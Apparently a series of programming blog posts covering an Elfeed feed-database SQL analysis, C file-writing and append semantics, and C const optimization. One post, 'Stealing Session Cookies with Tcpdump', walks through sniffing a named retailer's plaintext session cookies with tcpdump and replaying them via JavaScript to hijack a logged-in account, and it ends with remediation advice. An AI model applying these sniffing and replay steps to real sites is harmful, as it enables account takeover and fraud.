null program

An Elfeed Database Analysis

The end of the month marks Elfeed’s third birthday. Surprising to nobody, it’s also been three years of heavy, daily use by me. While I’ve used Elfeed concurrently on a number of different machines over this period, I’ve managed to keep an Elfeed database index with a lineage going all the way back to the initial development stages, before the announcement. It’s a large, organically-grown database that serves as a daily performance stress test. Hopefully this means I’m one of the first people to have trouble if an invisible threshold is ever exceeded.

I’m also the sort of person who gets excited when I come across an interesting dataset, and I have this gem sitting right in front of me. So a couple of days ago I pushed a new Elfeed function, elfeed-csv-export, which exports a database index into three CSV files. These are intended to serve as three tables in a SQL database, exposing the database to interesting relational queries and joins. Entry content (HTML, etc.) has always been considered volatile, so this is not exported. The export function isn’t interactive (yet?), so if you want to generate your own you’ll need to (require 'elfeed-csv) and evaluate it yourself.

All the source code for performing the analysis below on your own database can be found here:

The three exported tables are feeds, entries, and tags. Here are the corresponding columns (optional CSV header) for each:

feeds:   url, title, canonical-url, author
entries: id, feed, title, link, date
tags:    entry, feed, tag

And here’s the SQLite schema I’m using for these tables:

CREATE TABLE feeds (
    url TEXT PRIMARY KEY,
    title TEXT,
    canonical_url TEXT,
    author TEXT
);

CREATE TABLE entries (
    id TEXT NOT NULL,
    feed TEXT NOT NULL REFERENCES feeds (url),
    title TEXT,
    link TEXT NOT NULL,
    date REAL NOT NULL,
    PRIMARY KEY (id, feed)
);

CREATE TABLE tags (
    entry TEXT NOT NULL,
    feed TEXT NOT NULL,
    tag TEXT NOT NULL,
    FOREIGN KEY (entry, feed) REFERENCES entries (id, feed)
);

Web authors are notoriously awful at picking actually-unique entry IDs, even when using the smarter option, Atom. I still simply don’t trust that entry IDs are unique, so, as usual, I’ve qualified them by their source feed URL, hence the primary key on both columns in entries.

At this point I wish I had collected a lot more information. If I were to start fresh today, Elfeed’s database schema would not only fully match Atom’s schema, but also exceed it with additional logging:

I may start tracking some of these. If I don’t, I’ll be kicking myself three years from now when I look at this again.

A look at my index

So just how big is my index? It’s 25MB uncompressed, 2.5MB compressed. I currently follow 117 feeds, but my index includes 43,821 entries from 309 feeds. These entries are marked with 53,360 tags from a set of 35 unique tags. Some of these datapoints are the result of temporarily debugging Elfeed issues and don’t represent content that I actually follow. I’m more careful these days to test in a temporary database so as to avoid contamination. Some are duplicates due to feeds changing URLs over the years. Some are artifacts from old bugs. This all represents a bit of noise, but should be negligible. During my analysis I noticed some of these anomalies and took a moment to clean up obviously bogus data (weird dates, etc.), all by adjusting tags.

The first thing I wanted to know is the weekday frequency. A number of times I’ve blown entire Sundays working on Elfeed, and, as if to frustrate my testing, it’s not unusual for several hours to pass between new entries on Sundays. Is this just my perception or are Sundays really that slow?

Here’s my query. I’m using SQLite’s strftime to shift the result into my local time zone, Eastern Time. This time zone is the source, or close to the source, of a large amount of the content. This also automatically accounts for daylight savings time, which can’t be done with a simple divide and subtract.

SELECT tag,
       cast(strftime('%w', date, 'unixepoch', 'localtime') AS INT) AS day,
       count(id) AS count
FROM entries
JOIN tags ON tags.entry = entries.id AND tags.feed = entries.feed
GROUP BY tag, day;

The most frequent tag (13,666 appearances) is “youtube”, which marks every YouTube video, and I’ll use gnuplot to visualize it. The input “file” is actually a command since gnuplot is poor at filtering data itself, especially for histograms.

plot '< grep ^youtube, weekdays.csv' using 2:3 with boxes

Wow, things do quiet down dramatically on weekends! From the glass-half-full perspective, this gives me a chance to catch up when I inevitably fall behind on these videos during the week.

The same is basically true for other types of content, including “comic” (12,465 entries) and “blog” (7,505 entries).

However, “emacs” (2,404 entries) is a different story. It doesn’t slow down on the weekend, but Emacs users sure love to talk about Emacs on Mondays. In my own index, this spike largely comes from Planet Emacsen. Initially I thought maybe this was an artifact of Planet Emacsen’s date handling — i.e. perhaps it does a big fetch on Mondays and groups up the dates — but I double checked: they pass the date directly through from the original articles.

Conclusion: Emacs users love Mondays. Or maybe they hate Mondays and talk about Emacs as an escape.

I can reuse the same query to look at different time scales. When during the day do entries appear? Adjusting the time zone here becomes a lot more important.

SELECT tag,
       cast(strftime('%H', date, 'unixepoch', 'localtime') AS INT) AS hour,
       count(id) AS count
FROM entries
JOIN tags ON tags.entry = entries.id AND tags.feed = entries.feed
GROUP BY tag, hour;

Emacs bloggers tend to follow a nice Eastern Time sleeping schedule. (I wonder how Vim bloggers compare, since, as an Emacs user, I naturally assume Vim users’ schedules are as undisciplined as their bathing habits.) However, this might also be the prolific Irreal breaking the curve.

The YouTube channels I follow are a bit more erratic, but there’s still a big drop in the early morning and a spike in the early afternoon. It’s unclear if the timestamp published in the feed is the upload time or the publication time. This would make a difference in the result (e.g. overnight video uploads).

Do you suppose there’s a slow month?

SELECT tag,
       cast(strftime('%m', date, 'unixepoch', 'localtime') AS INT) AS month,
       count(id) AS count
FROM entries
JOIN tags ON tags.entry = entries.id AND tags.feed = entries.feed
GROUP BY tag, month;

December sees a big drop across all tags, probably due to the holidays. Both “comic” and “blog” have an interesting drop in August as well. For brevity, I’ll only show one. This might be partially due to my not waiting until the end of this month for this analysis, since there are only 2.5 Augusts in my 3-year dataset.

Unfortunately the timestamp is the only direct numerical quantity in the data. So far I’ve been binning data points and counting to get a second numerical quantity. Everything else is text, so I’ll need to get more creative to find other interesting relationships.

So let’s have a look at the lengths of entry titles.

SELECT tag,
       length(title) AS length,
       count(*) AS count
FROM entries
JOIN tags ON tags.entry = entries.id AND tags.feed = entries.feed
GROUP BY tag, length
ORDER BY length;

The shortest are the webcomics. I’ve complained about poor webcomic titles before, so this isn’t surprising. The spikes are from comics that follow a strict (uncreative) title format.

Emacs article titles follow a nice distribution. You can tell these are programmers because so many titles are exactly 32 characters long. Picking this number is such a natural instinct that we aren’t even aware of it. Or maybe all their database schemas have VARCHAR(32) title columns?

Blogs in general follow a nice distribution. The big spike is from the Dwarf Fortress development blog, which follows a strict date format.

The longest on average are YouTube videos. This is largely due to the kinds of videos I watch (“Let’s Play” videos), which tend to have long, predictable names.

And finally, here’s the most interesting-looking graph of them all.

SELECT ((date - 4*60*60) % (24*60*60)) / (60*60) AS day_time,
       length(title) AS length
FROM entries
JOIN tags ON tags.entry = entries.id AND tags.feed = entries.feed;

This is the title length versus time of day (not binned). Each point is one of the 53,360 posts.

set style fill transparent solid 0.25 noborder
set style circle radius 0.04
plot 'length-vs-daytime.csv' using 1:2 with circles

(This is a good one to follow through to the full size image.)

Again, all Eastern Time since I’m self-centered like that. Vertical lines are authors rounding their post dates to the hour. Horizontal lines are the length spikes from above, such as the line of entries at title length 10 in the evening (Dwarf Fortress blog). There’s a mid-day cloud of entries of various title lengths, with the shortest title cloud around mid-morning. That’s probably when many of the webcomics come up.

Additional analysis could look further at textual content, beyond simply length, in some quantitative way (n-grams? soundex?). But mostly I really need to keep track of more data!

tags: [ emacs elfeed ]

Automatic Deletion of Incomplete Output Files

Conventionally, a program that creates an output file will delete its incomplete output should an error occur while writing the file. It’s risky to leave behind a file that the user may reasonably mistake for a valid one. They might not have noticed the error.

For example, compression programs such as gzip, bzip2, and xz, when decompressing a file given as an argument, will create a new file with the compression extension removed. They write to this file as the compressed input is being processed. If the compressed stream contains an error in the middle, the partially-completed output is removed.

There are exceptions of course, such as programs that download files over a network. The partial result has value, especially if the transfer can be continued from where it left off. The convention is to append another extension, such as “.part”, to indicate a partial output.

The straightforward solution is to always delete the file as part of error handling. A non-interactive program would report the error on standard error, delete the file, and exit with an error code. However, there are at least two situations where error handling would be unable to operate: unhandled signals (usually including a segmentation fault) and power failures. A partial or corrupted output file will be left behind, possibly looking like a valid file.
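
As a concrete sketch of that convention in C (process_to_file here is just a hypothetical stand-in for whatever produces the real output, and the file name is arbitrary):

#include <stdio.h>
#include <stdlib.h>

/* Hypothetical worker: writes the output, returns 0 on success. */
static int
process_to_file(FILE *out)
{
    return fputs("example output\n", out) == EOF ? -1 : 0;
}

int
main(void)
{
    FILE *out = fopen("out.dat", "wb");
    if (!out) {
        perror("out.dat");
        exit(EXIT_FAILURE);
    }
    int err = process_to_file(out);
    if (fclose(out) == EOF)
        err = -1;
    if (err) {
        fprintf(stderr, "error: failed to write out.dat\n");
        remove("out.dat");  /* don't leave the incomplete file behind */
        exit(EXIT_FAILURE);
    }
    return 0;
}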

A common, more complex approach is to name the file differently from its final name while being written. If written successfully, the completed file is renamed into place. This is already required for durable replacement, so it’s basically free for many applications. In the worst case, where the program is unable to clean up, the obviously incomplete file is left behind only wasting space.
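
Here’s a rough sketch of that pattern on POSIX, where rename(2) atomically replaces the destination. The temporary name and the worker output are placeholders, and a fully durable replacement would also fsync the file and its directory, which I’ve omitted.

#include <stdio.h>

int
write_output(const char *final_name)
{
    /* Write under a temporary name... */
    FILE *out = fopen("out.tmp", "wb");
    if (!out)
        return -1;
    int err = fputs("example output\n", out) == EOF;  /* real work goes here */
    if (fclose(out) == EOF)
        err = 1;
    if (err) {
        remove("out.tmp");  /* best-effort cleanup */
        return -1;
    }
    /* ...then rename the completed file into place. */
    return rename("out.tmp", final_name);
}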

Looking to be more robust, I had the following misguided idea: Rely completely on the operating system to perform cleanup in the case of a failure. Initially the file would be configured to be automatically deleted when the final handle is closed. This takes care of all abnormal exits, and possibly even power failures. The program can just exit on error without deleting the file. Once written successfully, the automatic-delete indicator is cleared so that the file survives.

The target application for this technique supports both Linux and Windows, so I would need to figure it out for both systems. On Windows, there’s the flag FILE_FLAG_DELETE_ON_CLOSE. I’d just need to find a way to clear it. On POSIX, the file would be unlinked while being written, and linked into the filesystem on success. The latter turns out to be a lot harder than I expected.

Solution for Windows

I’ll start with Windows since the technique actually works fairly well here — ignoring the usual, dumb Win32 filesystem caveats. This is a little surprising, since it’s usually Win32 that makes these things far more difficult than they should be.

The primary Win32 function for opening and creating files is CreateFile. There are many options, but the key is FILE_FLAG_DELETE_ON_CLOSE. Here’s how an application might typically open a file for output.

DWORD access = GENERIC_WRITE;
DWORD create = CREATE_ALWAYS;
DWORD flags = FILE_FLAG_DELETE_ON_CLOSE;
HANDLE f = CreateFile("out.tmp", access, 0, 0, create, flags, 0);

This special flag asks Windows to delete the file as soon as the last handle to the file object is closed. Notice I said file object, not file, since these are different things. The catch: This flag is a property of the file object, not the file, and cannot be removed.

However, the solution is simple. Create a new link to the file so that it survives deletion. This even works for files residing on network shares.

CreateHardLink("out", "out.tmp", 0);
CloseHandle(f);  // deletes out.tmp file

The gotcha is that the underlying filesystem must be NTFS. FAT32 doesn’t support hard links. Unfortunately, since FAT32 remains the least common denominator and is still widely used for removable media, depending on the application, your users may expect support for saving files to FAT32. A workaround is probably required.

Solution for Linux

This is where things really fall apart. It’s just barely possible on Linux, it’s messy, and it’s not portable anywhere else. There’s no way to do this for POSIX in general.

My initial thought was to create a file then unlink it. Unlike the situation on Windows, files can be unlinked while they’re currently open by a process. These files are finally deleted when the last file descriptor (the last reference) is closed. Unfortunately, using unlink(2) to remove the last link to a file prevents that file from being linked again.

Instead, the solution is to use the relatively new (since Linux 3.11), Linux-specific O_TMPFILE flag when creating the file. Instead of a filename, this variation of open(2) takes a directory and creates an unnamed, temporary file in it. These files are special in that they’re permitted to be given a name in the filesystem at some future point.

For this example, I’ll assume the output is relative to the current working directory. If it’s not, you’ll need to open an additional file descriptor for the parent directory, and also use openat(2) to avoid possible race conditions (since paths can change from under you). The number of ways this can fail is already rapidly multiplying.

int fd = open(".", O_TMPFILE|O_WRONLY, 0600);

The catch is that only a handful of filesystems support O_TMPFILE. It’s like the FAT32 problem above, but worse. You could easily end up in a situation where it’s not supported, and will almost certainly require a workaround.

Linking a file from a file descriptor is where things get messier. The file descriptor must be linked with linkat(2) from its name on the /proc virtual filesystem, constructed as a string. The following snippet comes straight from the Linux open(2) manpage.

char buf[64];
sprintf(buf, "/proc/self/fd/%d", fd);
linkat(AT_FDCWD, buf, AT_FDCWD, "out", AT_SYMLINK_FOLLOW);
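
Putting the pieces together for an output directory other than the current working directory (as described above), a sketch might look something like this; create_output is a hypothetical helper, and error reporting is kept minimal:

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int
create_output(const char *dir, const char *name)
{
    /* Hold a descriptor for the destination directory so later
       operations aren't affected by the path changing underneath us. */
    int dirfd = open(dir, O_DIRECTORY | O_RDONLY);
    if (dirfd == -1)
        return -1;

    /* Create the unnamed, temporary file inside that directory. */
    int fd = openat(dirfd, ".", O_TMPFILE | O_WRONLY, 0600);
    if (fd == -1) {
        close(dirfd);
        return -1;
    }

    /* ... write the output through fd ... */

    /* On success, give the file its real name. */
    char buf[64];
    sprintf(buf, "/proc/self/fd/%d", fd);
    int r = linkat(AT_FDCWD, buf, dirfd, name, AT_SYMLINK_FOLLOW);
    close(dirfd);
    close(fd);
    return r;
}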

Even on Linux, /proc isn’t always available, such as within a chroot or a container, so this part can fail as well. In theory there’s a way to do this with the Linux-specific AT_EMPTY_PATH and avoid /proc, but I couldn’t get it to work.

// Note: this doesn't actually work for me.
linkat(fd, "", AT_FDCWD, "out", AT_EMPTY_PATH);

Given the poor portability (even within Linux), the number of ways this can go wrong, and that a workaround is definitely needed anyway, I’d say this technique is worthless. I’m going to stick with the tried-and-true approach for this one.

tags: [ c cpp win32 linux ]

Appending to a File from Multiple Processes

Suppose you have multiple processes appending output to the same file without explicit synchronization. These processes might be working in parallel on different parts of the same problem, or these might be threads blocked individually reading different external inputs. There are two concerns that come into play:

1) The append must be atomic such that it doesn’t clobber previous appends by other threads and processes. For example, suppose a write requires two separate operations: first moving the file pointer to the end of the file, then performing the write. There would be a race condition should another process or thread intervene in between with its own write.

2) The output will be interleaved. The primary solution is to design the data format as atomic records, where the ordering of records is unimportant — like rows in a relational database. This could be as simple as a text file with each line as a record. The concern is then ensuring records are written atomically.

This article discusses processes, but the same applies to threads when directly dealing with file descriptors.

Appending

The first concern is solved by the operating system, with one caveat. On POSIX systems, opening a file with the O_APPEND flag will guarantee that writes always safely append.

If the O_APPEND flag of the file status flags is set, the file offset shall be set to the end of the file prior to each write and no intervening file modification operation shall occur between changing the file offset and the write operation.

However, this says nothing about interleaving. Two processes successfully appending to the same file will result in all their bytes in the file in order, but not necessarily contiguously.
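
At the system call level, the guarantee is requested like this (open_log is just a hypothetical wrapper, and the mode is arbitrary):

#include <fcntl.h>

int
open_log(const char *path)
{
    /* Every write(2) on this descriptor is positioned at the current
       end of file, atomically, no matter who else is appending. */
    return open(path, O_WRONLY | O_CREAT | O_APPEND, 0644);
}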

The caveat is that not all filesystems are POSIX-compatible. Two famous examples are NFS and the Hadoop Distributed File System (HDFS). On these networked filesystems, appends are simulated and subject to race conditions.

On POSIX systems, fopen(3) with the a flag will use O_APPEND, so you don’t necessarily need to use open(2). On Linux this can be verified for any language’s standard library with strace.

#include <stdio.h>

int main(void)
{
    fopen("/dev/null", "a");
    return 0;
}
$ strace -e open ./a.out
open("/dev/null", O_WRONLY|O_CREAT|O_APPEND, 0666) = 3

For Win32, the equivalent is the FILE_APPEND_DATA access right, and similarly only applies to “local files.”

Interleaving and Pipes

The interleaving problem has two layers, and gets more complicated the more correct you want to be. Let’s start with pipes.

On POSIX, a pipe is unseekable and doesn’t have a file position, so appends are the only kind of write possible. When writing to a pipe (or FIFO), writes less than the system-defined PIPE_BUF are guaranteed to be atomic and non-interleaving.

Write requests of PIPE_BUF bytes or less shall not be interleaved with data from other processes doing writes on the same pipe. Writes of greater than PIPE_BUF bytes may have data interleaved, on arbitrary boundaries, with writes by other processes, […]

The minimum value for PIPE_BUF for POSIX systems is 512 bytes. On Linux it’s 4kB, and on other systems it’s as high as 32kB. As long as each record is less than 512 bytes, a simple write(2) will do. None of this depends on a filesystem since no files are involved.
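
So writing one record to the pipe can be nothing more than a single write(2). A minimal sketch, assuming the record has already been formatted into a buffer (write_record is a hypothetical helper):

#include <unistd.h>

/* Write one record (e.g. one line) in a single system call. As long
   as len is at most PIPE_BUF, it won't interleave with records from
   other writers on the same pipe. */
int
write_record(int fd, const char *record, size_t len)
{
    return write(fd, record, len) == (ssize_t)len ? 0 : -1;
}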

If PIPE_BUF bytes isn’t enough, the POSIX writev(2) can be used to atomically write up to IOV_MAX buffers of PIPE_BUF bytes. The minimum value for IOV_MAX is 16, but is typically 1024. This means the maximum safe atomic write size for pipes — and therefore the largest record size — for a perfectly portable program is 8kB (16✕512). On Linux it’s 4MB.
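
A sketch of the writev(2) variant, gathering the pieces of one larger record into a single call (struct iovec just pairs a pointer with a length; write_record_v is a hypothetical helper):

#include <sys/uio.h>

/* Gather the fields of one record into a single gathered write. Each
   buffer should be at most PIPE_BUF bytes, and nbufs at most IOV_MAX. */
int
write_record_v(int fd, const struct iovec *bufs, int nbufs)
{
    return writev(fd, bufs, nbufs) == -1 ? -1 : 0;
}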

That’s all at the system call level. There’s another layer to contend with: buffered I/O in your language’s standard library. Your program may pass data to the I/O library in appropriately-sized pieces for atomic writes, but the library may be undoing your hard work, concatenating these writes into a buffer and splitting apart your records. For this part of the article, I’ll focus on single-threaded C programs.

Suppose you’re writing a simple space-separated format with one line per record.

int foo, bar;
float baz;
while (condition) {
    // ...
    printf("%d %d %f\n", foo, bar, baz);
}

Whether or not this works depends on how stdout is buffered. C standard library streams (FILE *) have three buffering modes: unbuffered, line buffered, and fully buffered. Buffering is configured through setbuf(3) and setvbuf(3), and the initial buffering state of a stream depends on various factors. For buffered streams, the default buffer is at least BUFSIZ bytes, itself at least 256 (C99 §7.19.2¶7). Note: threads share this buffer.

Since each record in the above program easily fits inside 256 bytes, if stdout is a line buffered pipe then this program will interleave correctly on any POSIX system without further changes.
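
That “if” is doing some work: when stdout is a pipe rather than a terminal it’s typically fully buffered, not line buffered. A sketch that requests line buffering up front, so each complete line is flushed as a unit:

#include <stdio.h>

int
main(void)
{
    /* Request line buffering explicitly; each record is one line and
       fits comfortably within the buffer, so it flushes as a unit. */
    setvbuf(stdout, NULL, _IOLBF, BUFSIZ);

    int foo = 1, bar = 2;
    float baz = 3.0f;
    printf("%d %d %f\n", foo, bar, baz);
    return 0;
}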

If instead your output is comma-separated values (CSV) and your records may contain new line characters, there are two approaches. In each, the record must still be no larger than PIPE_BUF bytes.

If your situation is more complicated than this, you’ll probably have to bypass your standard library buffered I/O and call write(2) or writev(2) yourself.

Practical Application

If interleaving writes to a pipe stdout sounds contrived, here’s the real life scenario: GNU xargs with its --max-procs (-P) option to process inputs in parallel.

xargs -n1 -P$(nproc) myprogram < inputs.txt | cat > outputs.csv

The | cat ensures the output of each myprogram process is connected to the same pipe rather than to the same file.

A non-portable alternative to | cat, especially if you’re dispatching processes and threads yourself, is the splice(2) system call on Linux. It efficiently moves the output from the pipe to the output file without an intermediate copy to userspace. GNU Coreutils’ cat doesn’t use this.

Win32 Pipes

On Win32, anonymous pipes have no semantics regarding interleaving. Named pipes have per-client buffers that prevent interleaving. However, the pipe buffer size is unspecified, and requesting a particular size is only advisory, so it comes down to trial and error, though the unstated limits should be comparatively generous.

Interleaving and Files

Suppose instead of a pipe we have an O_APPEND file on POSIX. Common wisdom states that the same PIPE_BUF atomic write rule applies. While this often works, especially on Linux, this is not correct. The POSIX specification doesn’t require it and there are systems where it doesn’t work.

If you know the particular limits of your operating system and filesystem, and you don’t care much about portability, then maybe you can get away with interleaving appends. For full portability, pipes are required.

On Win32, writes on local files up to the underlying drive’s sector size (typically 512 bytes to 4kB) are atomic. Otherwise the only options are deprecated Transactional NTFS (TxF), or manually synchronizing your writes. All in all, it’s going to take more work to get correct.

Conclusion

My true use case for mucking around with clean, atomic appends is to compute giant CSV tables in parallel, with the intention of later loading into a SQL database (i.e. SQLite) for analysis. A more robust and traditional approach would be to write results directly into the database as they’re computed. But I like the platform-neutral intermediate CSV files — good for archival and sharing — and the simplicity of programs generating the data — concerned only with atomic write semantics rather than calling into a particular SQL database API.

tags: [ c linux posix win32 ]

Const and Optimization in C

Today there was a question on /r/C_Programming about the effect of C’s const on optimization. Variations of this question have been asked many times over the past two decades. Personally, I blame the naming of const.

Given this program:

void foo(const int *);

int
bar(void)
{
    int x = 0;
    int y = 0;
    for (int i = 0; i < 10; i++) {
        foo(&x);
        y += x;  // this load not optimized out
    }
    return y;
}

The function foo takes a pointer to const, which is a promise from the author of foo that it won’t modify the value of x. Given this information, it would seem the compiler may assume x is always zero, and therefore y is always zero.

However, inspecting the assembly output of several different compilers shows that x is loaded each time around the loop. Here’s gcc 4.9.2 at -O3, with annotations.

bar:
     push   rbp
     push   rbx
     xor    ebp, ebp              ; y = 0
     mov    ebx, 0xa              ; loop variable i
     sub    rsp, 0x18             ; allocate x
     mov    dword [rsp+0xc], 0    ; x = 0

.L0: lea    rdi, [rsp+0xc]        ; compute &x
     call   foo
     add    ebp, dword [rsp+0xc]  ; y += x  (not optimized?)
     sub    ebx, 1
     jne    .L0

     add    rsp, 0x18             ; deallocate x
     mov    eax, ebp              ; return y
     pop    rbx
     pop    rbp
     ret

The output of clang 3.5 (with -fno-unroll-loops) is the same, except ebp and ebx are swapped, and the computation of &x is hoisted out of the loop, into r14.

Are both compilers failing to take advantage of this useful information? Wouldn’t it be undefined behavior for foo to modify x? Surprisingly, the answer is no. In this situation, this would be a perfectly legal definition of foo.

void
foo(const int *readonly_x)
{
    int *x = (int *)readonly_x;  // cast away const
    (*x)++;
}

The key thing to remember is that const doesn’t mean constant. Chalk it up as a misnomer. It’s not an optimization tool. It’s there to inform programmers — not the compiler — as a tool to catch a certain class of mistakes at compile time. I like it in APIs because it communicates how a function will use certain arguments, or how the caller is expected to handle returned pointers. It’s usually not strong enough for the compiler to change its behavior.

Despite what I just said, occasionally the compiler can take advantage of const for optimization. The C99 specification, in §6.7.3¶5, has one sentence just for this:

If an attempt is made to modify an object defined with a const-qualified type through use of an lvalue with non-const-qualified type, the behavior is undefined.

The original x wasn’t const-qualified, so this rule didn’t apply. And there aren’t any rules against casting away const to modify an object that isn’t itself const. This means the above (mis)behavior of foo isn’t undefined behavior for this call. Notice how the undefined-ness of foo depends on how it was called.

With one tiny tweak to bar, I can make this rule apply, allowing the optimizer to do some work on it.

    const int x = 0;

The compiler may now assume that foo modifying x is undefined behavior, therefore it never happens. For better or worse, this is a major part of how a C optimizer reasons about your programs. The compiler is free to assume x never changes, allowing it to optimize out both the per-iteration load and y.

bar:
     push   rbx
     mov    ebx, 0xa            ; loop variable i
     sub    rsp, 0x10           ; allocate x
     mov    dword [rsp+0xc], 0  ; x = 0

.L0: lea    rdi, [rsp+0xc]      ; compute &x
     call   foo
     sub    ebx, 1
     jne    .L0

     add    rsp, 0x10           ; deallocate x
     xor    eax, eax            ; return 0
     pop    rbx
     ret

The load disappears, y is gone, and the function always returns zero.

Curiously, the specification allows the compiler to go even further. It’s permitted to allocate x somewhere off the stack, even in read-only memory. For example, it could perform a transformation like this:

static int __x = 0;

int
bar(void)
{
    for (int i = 0; i < 10; i++)
        foo(&__x);
    return 0;
}

Or on x86-64 (-fPIC, small code model), where we can see a few more instructions shaved off:

section .rodata
x:   dd     0

section .text
bar:
     push   rbx
     mov    ebx, 0xa        ; loop variable i

.L0: lea    rdi, [rel x]    ; compute &x
     call   foo
     sub    ebx, 1
     jne    .L0

     xor    eax, eax        ; return 0
     pop    rbx
     ret

Neither clang nor gcc took it this far, perhaps because it’s more disruptive to badly-behaved programs.

Even with this special const rule, only use const for yourself and for your fellow human programmers. Let the optimizer reason for itself about what is constant and what is not.

tags: [ c x86 ]

Stealing Session Cookies with Tcpdump

My wife was shopping online for running shoes when she got this classic Firefox pop-up.

These days this is usually just a server misconfiguration annoyance. However, she was logged into an account, which included a virtual shopping cart and associated credit card payment options, meaning actual sensitive information would be at risk.

The main culprit was the website’s search feature, which wasn’t transmitted over HTTPS. There’s an HTTPS version of the search (which I found manually), but searches aren’t directed there. This means it’s also vulnerable to SSL stripping.

Fortunately Firefox warns about the issue and requires a positive response before continuing. Neither Chrome nor Internet Explorer get this right. Both transmit session cookies in the clear without warning, then subtly mention it after the fact. She may not have even noticed the problem (and then asked me about it) if not for that pop-up.

I contacted the website’s technical support two weeks ago and they never responded, nor did they fix any of their issues, so for now you can see this all for yourself.

Finding the session cookies

To prove to myself that this whole situation was really as bad as it looked, I decided to steal her session cookie and use it to manipulate her shopping cart. First I hit F12 in her browser to peek at the network headers. Perhaps nothing important was actually sent in the clear.

The session cookie (red box) was definitely sent in the request. I only need to catch it on the network. That’s an easy job for tcpdump.

tcpdump -A -l dst www.roadrunnersports.com and dst port 80 | \
    grep "^Cookie: "

This command tells tcpdump to dump selected packet content as ASCII (-A). It also sets output to line-buffered so that I can see packets as soon as they arrive (-l). The filter will only match packets going out to this website and only on port 80 (HTTP), so I won’t see any extraneous noise (dst <addr> and dst port <port>). Finally, I crudely run that all through grep to see if any cookies fall out.

On the next insecure page load I get this (wrapped here for display) spilling many times into my terminal:

Cookie: JSESSIONID=99004F61A4ED162641DC36046AC81EAB.prd_rrs12; visitSo
  urce=Registered; RoadRunnerTestCookie=true; mobify-path=; __cy_d=09A
  78CC1-AF18-40BC-8752-B2372492EDE5; _cybskt=; _cycurrln=; wpCart=0; _
  up=1.2.387590744.1465699388; __distillery=a859d68_771ff435-d359-489a
  -bf1a-1e3dba9b8c10-db57323d1-79769fcf5b1b-fc6c; DYN_USER_ID=16328657
  52; DYN_USER_CONFIRM=575360a28413d508246fae6befe0e1f4

That’s a bingo! I massage this into a bit of JavaScript, go to the store page in my own browser, and dump it in the developer console. I don’t know which cookies are important, but that doesn’t matter. I take them all.

document.cookie = "Cookie: JSESSIONID=99004F61A4ED162641DC36046A" +
                  "C81EAB.prd_rrs12;";
document.cookie = "visitSource=Registered";
document.cookie = "RoadRunnerTestCookie=true";
document.cookie = "mobify-path=";
document.cookie = "__cy_d=09A78CC1-AF18-40BC-8752-B2372492EDE5";
document.cookie = "_cybskt=";
document.cookie = "_cycurrln=";
document.cookie = "wpCart=0";
document.cookie = "_up=1.2.387590744.1465699388";
document.cookie = "__distillery=a859d68_771ff435-d359-489a-bf1a-" +
                  "1e3dba9b8c10-db57323d1-79769fcf5b1b-fc6c";
document.cookie = "DYN_USER_ID=1632865752";
document.cookie = "DYN_USER_CONFIRM=575360a28413d508246fae6befe0e1f4";

Refresh the page and now I’m logged in. I can see what’s in the shopping cart. I can add and remove items. I can checkout and complete the order. My browser is as genuine as hers.

How to fix it

The quick and dirty thing to do is set the Secure and HttpOnly flags on all cookies. The first prevents cookies from being sent in the clear, where a passive observer might see them. The second prevents JavaScript from accessing them, since an active attacker could inject their own JavaScript into the page. Customers would appear to be logged out on plain HTTP pages, which is confusing.

However, since this is an online store, there’s absolutely no excuse to be serving anything over plain HTTP. This just opens customers up to downgrade attacks. The long term solution, in addition to the cookie flags above, is to redirect all HTTP requests to HTTPS and never serve or request content over HTTP, especially not executable content like JavaScript.

tags: [ ]

Elfeed, cURL, and You

This morning I pushed out an important update to Elfeed, my web feed reader for Emacs. The update should be available in MELPA by the time you read this. Elfeed now has support for fetching feeds using cURL through a curl inferior process. You’ll need the program in your PATH or configured through elfeed-curl-program-name.

I’ve been using it for a couple of days now, but, while I work out the remaining kinks, it’s disabled by default. So in addition to having cURL installed, you’ll need to set elfeed-use-curl to non-nil. Sometime soon it will be enabled by default whenever cURL is available. The original url-retrieve fetcher will remain in place for the time being. However, cURL may become a requirement someday.

Fetching with a curl inferior process has some huge advantages.

It’s much faster

The most obvious change is that you should experience a huge speedup on updates and better responsiveness during updates after the first cURL run. There are two important reasons:

Asynchronous DNS and TCP: Emacs 24 and earlier performs DNS queries synchronously even for asynchronous network processes. This is being fixed on some platforms (including Linux) in Emacs 25, but now we don’t have to wait.

On Windows it’s even worse: the TCP connection is also established synchronously. This is especially bad when fetching relatively small items such as feeds, because the DNS look-up and TCP handshake dominate the overall fetch time. It essentially makes the whole process synchronous.

Conditional GET: HTTP has two mechanisms to avoid transmitting information that a client has previously fetched. One is the Last-Modified header delivered by the server with the content. When querying again later, the client echoes the date back like a token in the If-Modified-Since header.

The second is the “entity tag,” an arbitrary server-selected token associated with each version of the content. The server delivers it along with the content in the ETag header, and the client hands it back later in the If-None-Match header, sort of like a cookie.

This is highly valuable for feeds because, unless the feed is particularly active, most of the time the feed hasn’t been updated since the last query. This avoids sending anything other than a handful of headers each way. In Elfeed’s case, it means it doesn’t have to parse the same XML over and over again.

Both of these being outside of cURL’s scope, Elfeed has to manage conditional GET itself. I had no control over the HTTP headers until now, so I couldn’t take advantage of it. Emacs’ url-retrieve function allows for sending custom headers through dynamically binding url-request-extra-headers, but this isn’t available when calling url-queue-retrieve since the request itself is created asynchronously.

Both the ETag and Last-Modified values are stored in the database and persist across sessions. This is the reason the full speedup isn’t realized until the second fetch. The initial cURL fetch doesn’t have these values.

Fewer bugs

As mentioned previously, Emacs has a built-in URL retrieval library called url. The central function is url-retrieve, which asynchronously fetches the content at an arbitrary URL (usually HTTP) and delivers the buffer and status to a callback when it’s ready. There’s also a queue front-end for it, url-queue-retrieve, which limits the number of parallel connections. Elfeed hands this function a pile of feed URLs all at once and it fetches them N at a time.

Unfortunately both these functions are incredibly buggy. It’s been a thorn in my side for years.

Here’s what the interface looks like for both:

(url-retrieve URL CALLBACK &optional CBARGS SILENT INHIBIT-COOKIES)

It takes a URL and a callback. Seeing this, the sane, unsurprising expectation is that the callback will be invoked exactly once for each time url-retrieve was called. In any case where the request fails, it should report it through the callback. This is not the case. The callback may be invoked any number of times, including zero.

In this example, suppose you have a webserver on port 8080 that will return an HTTP 404 at the given URL. Below, I fire off 10 asynchronous requests in a row.

(defvar results ())
(dotimes (i 10)
  (url-retrieve "http://127.0.0.1:8081/404"
                (lambda (status) (push (cons i status) results))))

What would you guess is the length of results? It’s initially 0 before any requests complete and over time (a very short time) I would expect this to top out at 10. On Emacs 24, here’s the real answer:

(length results)
;; => 46

The same error is reported multiple times to the callback. At least the pattern is obvious.

(cl-count 0 results :key #'car)
;; => 9
(cl-count 1 results :key #'car)
;; => 8
